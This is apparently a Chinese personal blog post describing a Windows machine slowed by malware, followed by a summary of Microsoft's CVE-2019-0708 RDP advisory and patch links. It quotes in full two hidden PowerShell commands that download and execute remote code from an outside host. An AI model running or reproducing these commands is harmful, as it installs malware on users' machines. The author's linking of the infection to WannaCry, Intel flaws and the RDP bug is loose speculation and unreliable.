今天Windows机器非常的卡,检查之后发现是CPU被占满了
而占满CPU两个进程的是:
powershell -nop -w hidden -ep bypass -c “IEX (New-Object Net.WebClient).downloadstring(‘http://down.bddp.net/d64.dat?allv6)”
powershell -nop -w hidden -ep bypass -c “IEX (New-Object Net.WebClient).downloadstring(‘http://down.bddp.net/newol.dat?allv6)”
经过一番查找发现原来这就是大名鼎鼎鼎鼎大名的:
WannaCrypt(永恒之蓝)勒索蠕虫
赶紧整了安全工具搞了一下就OK了,真不知道无缘无故的怎么会中毒呢?而且这台机子是前几天才刚刚启用的机子,今天就中毒了,难道是英特尔的新漏洞已经被黑客们利用了吗?
当天晚上就看到了新闻,由于太忙一直没空更新,现在更新一下
5月15日,微软发布安全补丁修复了CVE编号为CVE-2019-0708的Windows远程桌面服务(RDP)远程代码执行漏洞,该漏洞在不需身份认证的情况下即可远程触发,危害与影响面极大。
Windows 远程桌面服务(RDP)主要用于管理人员对 Windows 服务器进行远程管理,使用量极大。 近日,微软官方披露Windows中的远程桌面服务中存在远程代码执行漏洞,未经身份认证的攻击者可使用RDP协议连接到目标系统并发送精心构造的请求可触发该漏洞。 成功利用此漏洞的攻击者可在目标系统上执行任意代码,可安装应用程序,查看、更改或删除数据,创建完全访问权限的新账户等。
微软官方已经推出安全更新请参考以下官方安全通告下载并安装最新补丁:
https://support.microsoft.com/zh-cn/help/4500705/customer-guidance-for-cve-2019-0708
https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0708
只能对搞出永恒之蓝病毒NSA说一句:FxxxxxxxxxxxxxxxxxK!!!